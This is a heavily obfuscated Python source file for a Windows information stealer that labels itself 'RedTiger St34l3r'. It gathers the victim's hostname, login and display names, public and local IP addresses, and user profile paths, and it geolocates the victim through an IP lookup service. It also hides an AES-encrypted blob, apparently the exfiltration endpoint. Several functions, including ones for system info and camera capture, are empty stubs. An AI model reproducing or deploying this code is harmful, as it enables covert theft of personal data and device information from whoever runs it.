
import sys

def BHVVGREUINEIWQFMCXTRQLNBAKZQEBNBIEQBWBCIKLGIJWWGXKBBHHPIPQBAVDOCDSAKVNFEBIELVGIY():
    def HPJHQHBNOXAYDKWZFQAOKOBZEQANOQBWIVVSPXUNGSPIVAPBUINYJERAFSTSGBVMNMFXFOFGMUBORRTEYAWBHTJLLDDSTVKKJSK():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV = HPJHQHBNOXAYDKWZFQAOKOBZEQANOQBWIVVSPXUNGSPIVAPBUINYJERAFSTSGBVMNMFXFOFGMUBORRTEYAWBHTJLLDDSTVKKJSK()
        if ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV == True:
            return ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV
    except:
        return True
    
if BHVVGREUINEIWQFMCXTRQLNBAKZQEBNBIEQBWBCIKLGIJWWGXKBBHHPIPQBAVDOCDSAKVNFEBIELVGIY() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def CDQETDQWEWMTVTXDNXGYPHTAYMMXOZODCJCYLPQTQOKPBMRCJIKVTSRZYOOVUKXUSHMYXWZV(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI): 
    ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info = None
    return ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_system_info

def FAKRIQLLTWPHMSMOANUFTDYOHZFVYHWFPHMFNMMFMSJVQKJIUNOIHCQRXYKNJIANLSCCQONWUTHHAPHYUNATYGBUYVZOQGFQRQ(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI):
    KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY = None
    return KLUSZZRXTRKINCHHWDGCTRQQYEHGAFVLOFLOCTCXCGKZZQLUWMDSUQEYHREKXCIHULLZGYMUYPPUHLVOLFY

def YAQZVWLJXDMHLIDVNCITRFNENLHCJDIDPVUKUVHSCHGRHDWTGZUGBCBGUYJYBDAUZLNXNEBS(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI):
    MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE = None
    return MTFPKQQKWHARCXLVUMLOKLZSFDVQQQSEATSULVNWHZDOOTZCWWAVPRVBUEGVTPWGJWVFZVPDEXYXWXXIPIXQPMEPQTPITOWRE

def HGBBBFWDJQDUEKQFJAFLHODQVBODUKIWSSNMVJYKQHJZLNVXCYXFMHUIZDDCMTYDYWWMVLDGGTNTVQKUDDIDFDGYNRWK(): 
    DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN = None
    return DHBREOBZSBBZOSNRXBUQJSIYQEENKIKLDOSIPPWQRLOQFJUXBUVVRFLYWAYSBCHXN

def TELDOKQKPYTOKWQTIFAFMKRNJQWDETUFKLDJDREGNJPHPAWTVIHHFXQTZYKLKTUP(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI): 
    OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS = None
    CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS = None
    VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON = None
    LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP = None
    XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ = None
    NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI = None
    return OENUWSIBCHDBBSHEVOJJBGBONSBGJGERYZXCNLTUKJMCRZUFRHQRQMJXQZNHMURMGTMBJJUKINWHECBNSFHLGWVFS, CDVOIFUGZAREQDVEXPZSYZMFEDDWKPTILXJSTWIQCHRXKCWOSDYBRSVYDKAWJQWDMDADYDFETKXCLDISZPDVUNWCZSHKKUISHFS, VASJZLSYQUYEXNGQSODHGNABBWCXCMGNAQPFJJLTMNOGPHRAXRKBUZUYDPMFGJRRRTDRIQKSGHUSWHXCQJUDBLON, LPLGLSSOEFYLUSYQZOSAFCRYCEEBIVWKXFKHGQTPGJDZVSWQXOOZQSPJKDMFCUDZCLCHZXBOAYSHXJSSP, XKLHSMPZWHPGLUMYATNMUJABHBXWXLFMRWEGWXRLDZKTVHWRMOJ, NNDRYATTNXLAMKAEVEQZSANXMZZEEUOMPINAONIMQARIKQXPCJZIZOWSIGTPGFYJTNI

def QOIFRWRXVUPBWXYJXIEYGFBAGAUHBREXCONMTHCYJRDIOAHSLEQMASIPADOQGGIAEZWQHGJXSQUEFOHDQNHKZ(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI):
    MHCLFXYJIJWWQTRPTDLNDDOTIFDKNQSLKHCCKSZCRRLDFDOXGSRGDPDLEKOK = None
    RODXFLWPTINSOXSRZCOARJJENICLGGQHKJSOCEEOUUNQZURKIFBCVPEUAQNWTEDTPYDPCOQGKCW = None
    HNZKUCAZMJWHKRFDNHDBQJMKHADEXTNLKGMOQHURAOTYZOCLVDNRNOWNDHWTHW = None
    return MHCLFXYJIJWWQTRPTDLNDDOTIFDKNQSLKHCCKSZCRRLDFDOXGSRGDPDLEKOK, RODXFLWPTINSOXSRZCOARJJENICLGGQHKJSOCEEOUUNQZURKIFBCVPEUAQNWTEDTPYDPCOQGKCW, HNZKUCAZMJWHKRFDNHDBQJMKHADEXTNLKGMOQHURAOTYZOCLVDNRNOWNDHWTHW

def PTCWFEETQLZDVTBHMUXBSJLTNKAAWLLEDEBFZIFQDNQQTPZHPL(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI):
    FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW = None
    return FPVAEMNGFJQPYWHLWYEBFBVXQWPJBHHKERGICEPKJHKAFCJCNGOSHUGVPZXKEDKUHUPW

def GSGODXYXOBEKRIVHROCBVIPPVCQTHUOLFMVSMIVDCOVGTHTZKWTDHNNAWZCWHHLVHND(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI):
    ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture = None
    return ABRNNTMNGLVTKRGIQSAVYBCGPLFJDAMIQOYFGIHZCVMQVUPWMXUFSKKKEOCV_camera_capture

def KNNFWPPQHMOILISTTVWJONMMDQAHGSRFMFYDZGCENQDJXIRMMLJXZCZEYDDGAVYRHWFWLKHCY(GYKHPFJITYGQIABQSDFTZDVDGSIYZTRIZGOPLAMTLXPZNMHHMNMMPAJKFCHTQTSXDHDCAERVACPMGBOQWJXJOCNDCTIMUPHNI): 
    LERQGEFSGCWDKBQBGNEETWGIVTXNHZHQDNJKXJMYNXMXHUVXUAFHRXDTHPT = None
    return LERQGEFSGCWDKBQBGNEETWGIVTXNHZHQDNJKXJMYNXMXHUVXUAFHRXDTHPT

def UNCOGODZBFJBNKYIZGFDBLDILZHVZLFWIVXZXWYAHHMJYSCNBSBVEKQTPKV(): pass
def HFKFUIVNUFWLRYVKFPCUKGMWSHPWSWKYVCFBBVGKEZKXNCORWRCJWVZKLCG(): pass
def URGNVEYBHLDPJFDIXVFPABVRNTAAZWQCMRQKJWBFXFPINQDJSLYLPEPDERSOHESPNPTAFEMFLSTOZQ(): pass
def OZFIFLTIZPUAKWYHJATKSWPSLKHSRIIYVGFDPUIHXUCJXCHEKFISXNCJROJWIOKCIRARWUYDSP(): pass
def FGJCOXUEEHSQVFFVRCLETRRAQFSMJDQOVNASEWIAKOURBVKTISUZCZPDTPALNVDFGUCXJHFEDFBFIMDEFLZYQYWJ(): pass
def SYDZRHYNAGWOSYXJEORFCFIPTSUHHHAIHJNGQAJJQMYSANBOSEIFYJMILSOKXSRMTCZRSJYAEAAVKCHDJIZFXSUGYOHXFRYTW(): pass
def YDUBWQFAOHKDEJXKCISUMEYDFLVDXXGGIIHBZBXXQTJHGICGEXVOWWLWFMQCZYPYWGFAWAKVMBGUX(): pass
def NZWLNZMYEYUPFOBFFWWZNYJZBNXIXGJYRQKBWZTYUEVRJRFKLQZNVJDMJLHXLJTGFDTQCOSAEYYEOECRMAYSIZPQIS(): pass
def TTIETLCCEZBDAAHNNUGWKBWILEFFPSHRPMSJAVVPGERQXEVXEEYCROOPBJZWEGMLPVYZSHFNXCPVFBIORMXVELJJ(): pass
def JIHVBVCCAEUKYFIZXHTVESOYGELNMRZYXVCZTEOHFJGWSMUTJNGYZIQNVAYAYT(): pass
def NPRKMWSOGMRXBVRXYHKZPISWMOBNFUKRZKHZAPBVOFQZMRWGQCLEPIXEODWGYOHKFYJFO(): pass
def BNJQQZXPYILSKOBEOOVCMARLIRGWHTDUFHCXIOWLLOOMHWVEIROPY(): pass

def CLNBKHVUCXAHBYDXZAOKGLININOHCQHUCOJVMKMPYAKTNYJPWPMSZOFIVVEVQLGVRVIOTLXNSYFV(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def ZMYFBQCEGXKCNBJYUOGFNMAKTDWZCKPVDGDGJPGMMLRJEZEHUNRLCENFEV():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def TUKKPMEZPKCCXLTNANLHVSYJLTPKUKXPFCNDRRXGSWXYZLSXPCPFQLTLTJCOUUAOEIBKUSLGERIKPAJWJXHMDQZ(PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ, MPJILPWDJSJCNURBMJUOVRIUQTSBGPTEKTQQUWGSADHBQZQPEQXOADIIOUGAZQOSDRRRJMDVLRUSFBAUU):
    def KGJPOSSSKKHKIFUWMYDMKQVUOJDHWCEDABTDRJELRRZFSGRFIJARGWHANWBSMZEJMVSXRCXPWGWDGDYYDXUFVO(NPJVMSSSMNPOSMODODCLPCGITIGHLEYCFIXDGRBUXVSJXYXTZQWQMGZTXXPRNFQEUYZJDHQZALGHMOTEUUANR, BZPREPGCLFXKJNWKRVOEYZISCSIXEJXNKQUZGGVLUKKJFEWHQTKSGCESSSPFPZJUAUAOEJ):
        YJIWELDRCSLMXWTDAYHNORDEZXLWKRDYEWQEWEDHPTSYKOMMCVZFMEMHEAFZISZPYGSURZNAUJWCTCJCFLQVIFWISDKEFAZ = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=BZPREPGCLFXKJNWKRVOEYZISCSIXEJXNKQUZGGVLUKKJFEWHQTKSGCESSSPFPZJUAUAOEJ, iterations=100000, backend=default_backend())
        if isinstance(NPJVMSSSMNPOSMODODCLPCGITIGHLEYCFIXDGRBUXVSJXYXTZQWQMGZTXXPRNFQEUYZJDHQZALGHMOTEUUANR, str):  
            NPJVMSSSMNPOSMODODCLPCGITIGHLEYCFIXDGRBUXVSJXYXTZQWQMGZTXXPRNFQEUYZJDHQZALGHMOTEUUANR = NPJVMSSSMNPOSMODODCLPCGITIGHLEYCFIXDGRBUXVSJXYXTZQWQMGZTXXPRNFQEUYZJDHQZALGHMOTEUUANR.encode()  
        return YJIWELDRCSLMXWTDAYHNORDEZXLWKRDYEWQEWEDHPTSYKOMMCVZFMEMHEAFZISZPYGSURZNAUJWCTCJCFLQVIFWISDKEFAZ.derive(NPJVMSSSMNPOSMODODCLPCGITIGHLEYCFIXDGRBUXVSJXYXTZQWQMGZTXXPRNFQEUYZJDHQZALGHMOTEUUANR)

    PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data = base64.b64decode(PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ)
    BZPREPGCLFXKJNWKRVOEYZISCSIXEJXNKQUZGGVLUKKJFEWHQTKSGCESSSPFPZJUAUAOEJ = PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data[:16]
    KLVRQTTFLQWIOEDDNYAVKHHYQVZNPMVKVTAWBJZQHHBBHJRZAICNGKCQSBNHSENOGCXLCFFOPZAWOERFJUBJNDMXLEIPM = PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data[16:32]
    PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data = PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data[32:]
    HYYPJXJMPRFDGVFLFNHCUWRHOJBGHQJNPNMFTDAPYTNQWIAYGPNTHHFZVRB = KGJPOSSSKKHKIFUWMYDMKQVUOJDHWCEDABTDRJELRRZFSGRFIJARGWHANWBSMZEJMVSXRCXPWGWDGDYYDXUFVO(MPJILPWDJSJCNURBMJUOVRIUQTSBGPTEKTQQUWGSADHBQZQPEQXOADIIOUGAZQOSDRRRJMDVLRUSFBAUU, BZPREPGCLFXKJNWKRVOEYZISCSIXEJXNKQUZGGVLUKKJFEWHQTKSGCESSSPFPZJUAUAOEJ)
    QEKHFJFBADFUXUIFAPEUUMLGYDVZJANYMIUFWMWBXOYJAQFSYSDHYAFTZMDGNWGOLFGKRQIVHRVA = Cipher(algorithms.AES(HYYPJXJMPRFDGVFLFNHCUWRHOJBGHQJNPNMFTDAPYTNQWIAYGPNTHHFZVRB), modes.CBC(KLVRQTTFLQWIOEDDNYAVKHHYQVZNPMVKVTAWBJZQHHBBHJRZAICNGKCQSBNHSENOGCXLCFFOPZAWOERFJUBJNDMXLEIPM), backend=default_backend())
    LZKZEVHTCPXUTWEUHVAVMDTBAURJAPIKVJPRGAGESSYXSTCEJLWLXNAWQITCVEMHIKBTIHUMASIKYXR = QEKHFJFBADFUXUIFAPEUUMLGYDVZJANYMIUFWMWBXOYJAQFSYSDHYAFTZMDGNWGOLFGKRQIVHRVA.decryptor()
    YFKWPFWBRHKQSAGTCNMFUUBKRCJTPMLPALLBHKQUPKACOOSZXGGZDNLQMSRXXERQCTCWAAZDRVNUEKKYDQQ = LZKZEVHTCPXUTWEUHVAVMDTBAURJAPIKVJPRGAGESSYXSTCEJLWLXNAWQITCVEMHIKBTIHUMASIKYXR.update(PIIMLEWAHOSCSGSBDTZOINIZARABDBEHNHGTKDDWJHNKCBZQRUQZYGVFGDEYXIHTVIGUPWKMMJTYUIOCUQ_data) + LZKZEVHTCPXUTWEUHVAVMDTBAURJAPIKVJPRGAGESSYXSTCEJLWLXNAWQITCVEMHIKBTIHUMASIKYXR.finalize()
    EYIVRXSAVZMFMCDTGWSJNBMXCVMKPYBFABFEYZEGNTHDGAVHKDIBXAZCEJHKSSWMUR = padding.PKCS7(128).unpadder()
    BBWBYLBJDTZLFJZRWJBPATIBCNONZHWLKMIKWURPADMICDLEHZMOSPUBDAEULZZNTFGMZYOFMWNQHUQHIAFDJWF = EYIVRXSAVZMFMCDTGWSJNBMXCVMKPYBFABFEYZEGNTHDGAVHKDIBXAZCEJHKSSWMUR.update(YFKWPFWBRHKQSAGTCNMFUUBKRCJTPMLPALLBHKQUPKACOOSZXGGZDNLQMSRXXERQCTCWAAZDRVNUEKKYDQQ) + EYIVRXSAVZMFMCDTGWSJNBMXCVMKPYBFABFEYZEGNTHDGAVHKDIBXAZCEJHKSSWMUR.finalize()
    return BBWBYLBJDTZLFJZRWJBPATIBCNONZHWLKMIKWURPADMICDLEHZMOSPUBDAEULZZNTFGMZYOFMWNQHUQHIAFDJWF.decode()

CLNBKHVUCXAHBYDXZAOKGLININOHCQHUCOJVMKMPYAKTNYJPWPMSZOFIVVEVQLGVRVIOTLXNSYFV("")

try: VVSUQONKEESUNDQYVHVYDTGRWWITLMGECJHIQZVZAEUWWLYAPBZEUYCEVRXFLZQCCYHAAZLSIFXNHSGDUGSSVVONTJLSI    = socket.gethostname()
except: VVSUQONKEESUNDQYVHVYDTGRWWITLMGECJHIQZVZAEUWWLYAPBZEUYCEVRXFLZQCCYHAAZLSIFXNHSGDUGSSVVONTJLSI = "None"

try: ZQATRCPFCNNZJROXJTVZCFGGWBRYMMRLJVGEGYUJPWGXNKUCXDXWODTOIUVFRAUVLOAXQCMPHUPKMZF    = os.getlogin()
except: ZQATRCPFCNNZJROXJTVZCFGGWBRYMMRLJVGEGYUJPWGXNKUCXDXWODTOIUVFRAUVLOAXQCMPHUPKMZF = "None"

try: VSQTLINTCHIKQQKDZMOYZCZYTUHMIMAQGSCILZGIJQHUGFCJFCRCZRQYPJATWNXPOHUEUEQTIFWINRUQMSRYBRYYAUYQJGKBVT    = win32api.GetUserNameEx(win32api.NameDisplay)
except: VSQTLINTCHIKQQKDZMOYZCZYTUHMIMAQGSCILZGIJQHUGFCJFCRCZRQYPJATWNXPOHUEUEQTIFWINRUQMSRYBRYYAUYQJGKBVT = "None"

try: TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK = "None"

try: SXYDOVCUVVBTLVILHCADGOHRQZJHTHDCBQNYTMXPJMDXGRTDSRUKRPJXKPHC    = socket.gethostbyname(socket.gethostname())
except: SXYDOVCUVVBTLVILHCADGOHRQZJHTHDCBQNYTMXPJMDXGRTDSRUKRPJXKPHC = "None"

FTHAXSMMBWFRFVRWREYMVVLNEAJMYJPSSGXJNJVXGROTIXNVHJPNPICAPVYGUBVGSUZDPNCCPUIIUAPRMDKCUXIYKSXTBGA = r"""
Urz4Xffd62FpibXORtSn5Woi5lbOLE6gbhVqBukfThWqSmEoICQ6N518cwl+efvFQvLyEpw6zcCDKaQiVWMhf9ksnBYmRCT0ES7fIpI9oitZrCDjSnKI3xSpMY9XoBQTCqo4KOlIoKjdMKgEOgfb5kQUrMGU2U2vsKKEfl4MHEWMJmTUFsHQtRnm/Rr7LnVAzp0KpwcfVVolva2HR/N6tQ==
"""

KHECMYTMFUIBRGPZPHNGQROFSBWHVHYKMRUXXYDFHXGZSNHGPIARKUVUBCRHWUWJSPEJ            = "YrRcHjemXyiMAiuiixraIWrLZtzagoTQPflITxrAPKzVuRcSNoaBYmlXLpYgZyjzWpsCXigvxArzsJIBaclaHVWICjZeVhgzJUBEyxBb"
ERHXZIWHBSMDQECFPGXGBDNVQRTTFDAYBUZCOTDENMLAUFNJMTKAVAWDSGBRSTCUMGYHHOBUAKJRVHTXKJCIRLKGHIDQOLDIYXX        = "None"
NZMOUGMLKLIUIHBHAMBYXWTPWPFAZTIUKQLZCJRBPRVKMHBHQQPEUYMIEFAQEOXQNWIMHIKYHRCBEBGWYEOZRSLIEANJJBHQZLL    = 0xa80505
UGTRNXTXLBRLTKMIMGDVWMDKYIKWBYJQCFYSFDFEFBWVEOBBJUUOCJKQKHCRNELFVBJANHNKXFGIMILKJGI = "RedTiger St34l3r"
GJFPFEOHFAGJMDCOMVNRGHEXXUSWTSRRJRPGYBRDXIQRYPZBXFPUK   = "https://google.com"
JVMFEKEDQZGCLHQWYSQRNRUUZCHYWGOBWZDJLKNKKDGQUWBWLOJBOKOLNFORGQARRAUQIHBOYZYMEAEZZZ    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
FOODBSQGCVVIATOMVSOBPQILRINELNCPTWEHLKPVUPSXVLEWELRSWCMIENKZBDFBSUMTXMIJYJFTIDZDCHFOBRBFOMHV   = {"text": JVMFEKEDQZGCLHQWYSQRNRUUZCHYWGOBWZDJLKNKKDGQUWBWLOJBOKOLNFORGQARRAUQIHBOYZYMEAEZZZ, "icon_url": GJFPFEOHFAGJMDCOMVNRGHEXXUSWTSRRJRPGYBRDXIQRYPZBXFPUK}
GTASFSJIOZNELLVLHEVLZCYQYYEQFHZSQCOPGZMIBMDBVHCKPTIAIGNMEXOWBYVWZROISQDGWGMUFYCMXM    = f'`{ZQATRCPFCNNZJROXJTVZCFGGWBRYMMRLJVGEGYUJPWGXNKUCXDXWODTOIUVFRAUVLOAXQCMPHUPKMZF} "{TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK}"`'
YCHGWJQUWPANVXMFKQJKWGNCFOYDIAWCFXPDTGWBCUZESEKHOJMSLTGKMBFGXFXJHYWDO    = TUKKPMEZPKCCXLTNANLHVSYJLTPKUKXPFCNDRRXGSWXYZLSXPCPFQLTLTJCOUUAOEIBKUSLGERIKPAJWJXHMDQZ(FTHAXSMMBWFRFVRWREYMVVLNEAJMYJPSSGXJNJVXGROTIXNVHJPNPICAPVYGUBVGSUZDPNCCPUIIUAPRMDKCUXIYKSXTBGA, KHECMYTMFUIBRGPZPHNGQROFSBWHVHYKMRUXXYDFHXGZSNHGPIARKUVUBCRHWUWJSPEJ)

RPKKNOMGBPHZYEKSNSRQGRKQCYXMMEWOEVWCDKXQMKWWXPHBCOPYUSHXFT           = os.getenv("WINDIR", None)
ZUVTQZSRLLEIWCITOMFPVIJYUFSVFMLVHGWHAMZFKLUALQWBOYLIIYRSWKFSKYM       = os.getenv('USERPROFILE', None)
QWRHHZYZZRKJUYBFRFIIHMUOFREHWQUTVTIOYTNGAEKSDQOPLIQFBRBSXKLWEJOAKL     = os.getenv('LOCALAPPDATA', None)
IWHUUXOANUPZXRFZHIUJUHJWCVQGKQIOMEHRDVVHMAMUWLELTQTFWCAVEJDLDKVZVPOVQCAHPWQ   = os.getenv('APPDATA', None)
EHFVCKFMUOWFFWZZIGLGWUNEGJZLNPIVWAPCDROVHKWYCMFVNFDJHJBVNWYCFTRUQUOWDLUZBTULNEOJKHTTEBO = os.getenv('ProgramFiles(x86)', None)
if EHFVCKFMUOWFFWZZIGLGWUNEGJZLNPIVWAPCDROVHKWYCMFVNFDJHJBVNWYCFTRUQUOWDLUZBTULNEOJKHTTEBO is None:
    EHFVCKFMUOWFFWZZIGLGWUNEGJZLNPIVWAPCDROVHKWYCMFVNFDJHJBVNWYCFTRUQUOWDLUZBTULNEOJKHTTEBO = os.getenv('ProgramFiles', None)

try:
    OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ = requests.get(f"https://{ERHXZIWHBSMDQECFPGXGBDNVQRTTFDAYBUZCOTDENMLAUFNJMTKAVAWDSGBRSTCUMGYHHOBUAKJRVHTXKJCIRLKGHIDQOLDIYXX}/api/ip/ip={TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK}")
    KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT = OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ.json()

    IPCBELQRFLRGCBQYMBGHDCPGPYQEILIAVMKAGYCVTLNVHSLIZSUQEHEQXBAURMLJTNKPPDILBBKBUALGENAVFNUGLTRDVYZJ = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('country', "None")
    IPCBELQRFLRGCBQYMBGHDCPGPYQEILIAVMKAGYCVTLNVHSLIZSUQEHEQXBAURMLJTNKPPDILBBKBUALGENAVFNUGLTRDVYZJ_code = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('country_code', "None")
    YGAEVYNKGMQLXFOTSJSGYQLCBOAQNFKUHJIYHREEJREVTKNUWDA = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('region', "None")
    YGAEVYNKGMQLXFOTSJSGYQLCBOAQNFKUHJIYHREEJREVTKNUWDA_code = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('region_code', "None")
    XFRGBYTEJAARQDCARIRLIXXVFUWZLBPOQOIPIDYMNPYHMLAXUOHFBCNUVKKRFJDTPBIZRZZOOOBXKDUMDFONONNCRSYWPMCFNYQ = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('zip', "None")
    OPJHEKSGKGORUZGWMTIQUJTUAGIKEIXTLZYGLLFJTUHDRCLMOYAQGUNRSMGYVSRJDSSGYNLG = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('city', "None")
    AJFIRJMOUAQBUSTZQAUUQFDXVHDZJEZALOKTBMYWZMEYRJQXWBBWSBDGEKEADMWSTSG = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('latitude', "None")
    QYWNITXHGJNVVECDYGARLEXXBPRAIJMCVTGDNSDAXOATLTMDURGOLDMADANUJBUBAXRSMCOPDACOSZU = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('longitude', "None")
    NJQVXQSMUGFKTNZHQSGRXLBHCKDECFKVHEXQCZQDEYVUHSJNVQSVSAQDBJQYTWTJDVMKBTFMMLHYJE = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('timezone', "None")
    BSJZSSWNXODFGPKVBRIXCNKOZICABEKADWMCBSNGIIJGQRPWZZFVSGQOEDLQQUKYEDEVC = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('isp', "None")
    UPGYLLSEHKJCCJOEDNSFODZZRUUDDAMAATZQZCPYANJHKYZWJKGIHVMEYRHZMY = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('org', "None")
    LOZAXKWYGADPDERUYSSJLVZWESSGYXSILPTJWWNOXMSHSEUCLIAALKR = KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT.get('as', "None")
except:
    OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ = requests.get(f"http://ip-api.com/json/{TINHQYUZIWDWZRHORFYTCMQAOQDBOVRGBDDOPJQMFFSTJZBLJHSUKWYNSEKCPWLJXQLODMRQYJPYMVDIACWERWVGMYNNPVPSFK}")
    KBAHGIIIJSCPZBGTRDCWVKCFRDVABCMPCJFTIQFJSZZNIDSJHPGJPT = OPYUDTNYZLOYANKWQTJMAJLGIKWAIUCJSFEFSQAFAEIFTALSVYQBEDRFNELFUUPKMGBGROJDRZ.json()

